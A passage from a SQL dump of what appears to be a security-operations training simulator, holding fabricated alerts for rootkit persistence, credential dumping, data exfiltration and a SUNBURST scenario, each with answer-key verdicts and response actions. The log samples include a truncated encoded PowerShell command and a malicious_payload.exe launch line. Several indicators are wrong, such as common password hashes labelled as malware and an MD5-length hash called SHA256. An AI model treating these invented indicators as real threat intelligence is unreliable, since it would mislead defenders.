Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the engineer\'s workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b1d5a9c5e9f6a8d8f0c4e2a7d3f9a5b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the APT_Equation_Backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"john.doe@trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address used in previous phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Project_Timeline_Update.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Attachment 
Analysis\",\"verdict\":\"malicious\",\"details\":\"Document contains macros that execute malicious code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Initial Access Detected\",\"date\":\"2026-02-01T20:32:22.176Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(552, 'Malicious Code Execution Alert', 'high', 'Endpoint Detection and Response', 'A malicious payload was executed on a compromised system which installs a rootkit, preparing for the next phase of the attack.', 'Code Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:34Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"process_name\":\"cmd.exe\",\"process_command_line\":\"cmd.exe /c C:\\\\Windows\\\\System32\\\\malicious_payload.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"malicious_payload.exe\",\"action\":\"Executed\",\"severity\":\"high\",\"description\":\"Malicious payload executed on endpoint\"}', '2026-01-07 22:35:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised system\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Malware file associated with known attack vectors\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"SHA256 hash identified as malicious by multiple AV engines\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(553, 'Rootkit Establishes Persistence', 'high', 'System Registry and Scheduled Tasks', 'A rootkit has been detected establishing persistence on the compromised system. It has modified system registry keys and created scheduled tasks to ensure its presence even after system reboots. The rootkit utilizes known persistence techniques to maintain long-term access.', 'Persistence Mechanism', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"system\":{\"computer\":\"compromised-machine.local\",\"user\":\"j.doe\",\"ip_address\":\"10.0.2.15\"},\"registry_changes\":[{\"key\":\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"maliciousStartup\",\"data\":\"C:\\\\Windows\\\\system32\\\\malicious.exe\"}],\"scheduled_tasks\":[{\"task_name\":\"UpdateService\",\"action\":\"C:\\\\Windows\\\\system32\\\\malicious.exe\",\"trigger\":\"Logon\"}],\"network\":{\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}}', '2026-01-07 22:35:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with prior attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with rootkit.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User 
account on the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"compromised-machine.local\\\",\\\"user\\\":\\\"j.doe\\\",\\\"ip_address\\\":\\\"10.0.2.15\\\"},\\\"registry_changes\\\":[{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"maliciousStartup\\\",\\\"data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\"}],\\\"scheduled_tasks\\\":[{\\\"task_name\\\":\\\"UpdateService\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Logon\\\"}],\\\"network\\\":{\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"compromised-machine.local\\\",\\\"user\\\":\\\"j.doe\\\",\\\"ip_address\\\":\\\"10.0.2.15\\\"},\\\"registry_changes\\\":[{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"maliciousStartup\\\",\\\"data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\"}],\\\"scheduled_tasks\\\":[{\\\"task_name\\\":\\\"UpdateService\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Logon\\\"}],\\\"network\\\":{\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"compromised-machine.local\\\",\\\"user\\\":\\\"j.doe\\\",\\\"ip_address\\\":\\\"10.0.2.15\\\"},\\\"registry_changes\\\":[{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"maliciousStartup\\\",\\\"data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\"}],\\\"scheduled_tasks\\\":[{\\\"task_name\\\":\\\"UpdateService\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Logon\\\"}],\\\"network\\\":{\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"compromised-machine.local\\\",\\\"user\\\":\\\"j.doe\\\",\\\"ip_address\\\":\\\"10.0.2.15\\\"},\\\"registry_changes\\\":[{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"maliciousStartup\\\",\\\"data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\"}],\\\"scheduled_tasks\\\":[{\\\"task_name\\\":\\\"UpdateService\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Logon\\\"}],\\\"network\\\":{\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"compromised-machine.local\\\",\\\"user\\\":\\\"j.doe\\\",\\\"ip_address\\\":\\\"10.0.2.15\\\"},\\\"registry_changes\\\":[{\\\"key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"maliciousStartup\\\",\\\"data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\"}],\\\"scheduled_tasks\\\":[{\\\"task_name\\\":\\\"UpdateService\\\",\\\"action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Logon\\\"}],\\\"network\\\":{\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(554, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'Using dumped credentials, the attacker moves laterally through the network, targeting systems connected to industrial control networks.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:30Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"SMB\",\"username\":\"admin_jdoe\",\"filename\":\"credentials.dmp\",\"hash\":\"f2c7e6c6f8e5b6a5c4d9e8a6b3c7f1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8\",\"action\":\"Successful Login\",\"log_id\":\"123456789\"}', '2026-01-07 22:35:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with credential dumping operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the target system within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid network administrator account.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credentials.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"File associated with credential dumping activity.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"f2c7e6c6f8e5b6a5c4d9e8a6b3c7f1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a credential dumping 
tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(555, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention', 'A data exfiltration attempt was detected involving critical industrial control system information. The attacker utilized a known malware to transfer files to an external IP address.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:55:32Z\",\"event_id\":\"DLP-2023-1025-0001\",\"source_ip\":\"192.168.15.45\",\"destination_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"filename\":\"ICS_critical_data.zip\",\"action\":\"block\",\"protocol\":\"HTTPS\",\"outcome\":\"success\",\"description\":\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\"}', '2026-01-07 22:35:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with known exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ICS_critical_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of targeted ICS data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account 
potentially compromised to facilitate data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:55:32Z\\\",\\\"event_id\\\":\\\"DLP-2023-1025-0001\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ICS_critical_data.zip\\\",\\\"action\\\":\\\"block\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outcome\\\":\\\"success\\\",\\\"description\\\":\\\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:55:32Z\\\",\\\"event_id\\\":\\\"DLP-2023-1025-0001\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ICS_critical_data.zip\\\",\\\"action\\\":\\\"block\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outcome\\\":\\\"success\\\",\\\"description\\\":\\\"Sensitive data exfiltration blocked by DLP policy. 
File transfer attempt to external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:55:32Z\\\",\\\"event_id\\\":\\\"DLP-2023-1025-0001\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ICS_critical_data.zip\\\",\\\"action\\\":\\\"block\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outcome\\\":\\\"success\\\",\\\"description\\\":\\\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:55:32Z\\\",\\\"event_id\\\":\\\"DLP-2023-1025-0001\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ICS_critical_data.zip\\\",\\\"action\\\":\\\"block\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outcome\\\":\\\"success\\\",\\\"description\\\":\\\"Sensitive data exfiltration blocked by DLP policy. 
File transfer attempt to external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:55:32Z\\\",\\\"event_id\\\":\\\"DLP-2023-1025-0001\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ICS_critical_data.zip\\\",\\\"action\\\":\\\"block\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"outcome\\\":\\\"success\\\",\\\"description\\\":\\\"Sensitive data exfiltration blocked by DLP policy. File transfer attempt to external IP.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(556, 'Initial Access via Compromised SolarWinds Update', 'critical', 'Network Traffic Logs', 'APT29 gains initial access by compromising the SolarWinds Orion software update, distributing the SUNBURST backdoor to numerous high-profile targets. Anomalous network traffic detected from an internal server communicating with a known malicious external IP associated with the SUNBURST backdoor.', 'Supply Chain Attack', 'T1195.002', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:32:17Z\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"185.100.87.55\",\"protocol\":\"HTTPS\",\"src_port\":443,\"dest_port\":443,\"http_request\":{\"url\":\"https://updates.solarwinds.com/orion/SUNBURST.dll\",\"method\":\"GET\"},\"file_hash\":\"b91ce2fa41029f6955bff20079468448\",\"user_agent\":\"SolarWindsOrion/2020.2.1\",\"internal_username\":\"admin\"}', '2026-01-07 22:39:53', '2026-02-16 18:07:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server identified as part of the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.100.87.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with SUNBURST backdoor activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b91ce2fa41029f6955bff20079468448\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to SUNBURST.dll known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://updates.solarwinds.com/orion/SUNBURST.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"URL distributing SUNBURST 
backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(557, 'SUNBURST Backdoor Activation', 'critical', 'Endpoint Detection Systems', 'Upon successful update, the SUNBURST backdoor is activated, allowing APT29 to remotely control the infected systems.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"4521\",\"source_ip\":\"185.243.115.84\",\"destination_ip\":\"10.0.0.15\",\"filename\":\"SolarWinds.Orion.Core.BusinessLayer.dll\",\"hash\":\"b91ce2fa41029f6955bff20079468448\",\"user\":\"jdoe\",\"process\":\"orion.exe\",\"action\":\"execution\",\"details\":\"The SolarWinds.Orion.Core.BusinessLayer.dll file was executed, activating the SUNBURST backdoor.\",\"protocol\":\"TCP\"}', '2026-01-07 22:39:53', '2026-02-16 18:07:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.243.115.84\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT29 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b91ce2fa41029f6955bff20079468448\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with SUNBURST malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"SolarWinds.Orion.Core.BusinessLayer.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File involved in SUNBURST backdoor activation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
